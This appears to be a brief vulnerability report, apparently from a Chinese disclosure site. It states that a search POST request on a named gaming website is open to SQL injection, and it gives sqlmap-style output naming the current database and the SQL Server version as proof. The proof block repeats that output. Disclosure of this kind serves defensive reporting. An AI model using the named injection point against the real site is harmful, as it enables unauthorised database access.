URL http://subject.ourgame.com/2009/FactionInfo/Query.aspx POST 搜索时产生 1:dbs
2: current-db [10:08:56] [INFO] retrieved: GLJHWEB current database: 'GLJHWEB' 3: @@version Microsoft SQL Server 2008 R2 (SP2) - 10.50.4000.0 (X64) Copyright (c) Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) .....
漏洞证明:
1:dbs
2: current-db [10:08:56] [INFO] retrieved: GLJHWEB current database: 'GLJHWEB' 3: @@version Microsoft SQL Server 2008 R2 (SP2) - 10.50.4000.0 (X64) Copyright (c) Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) .....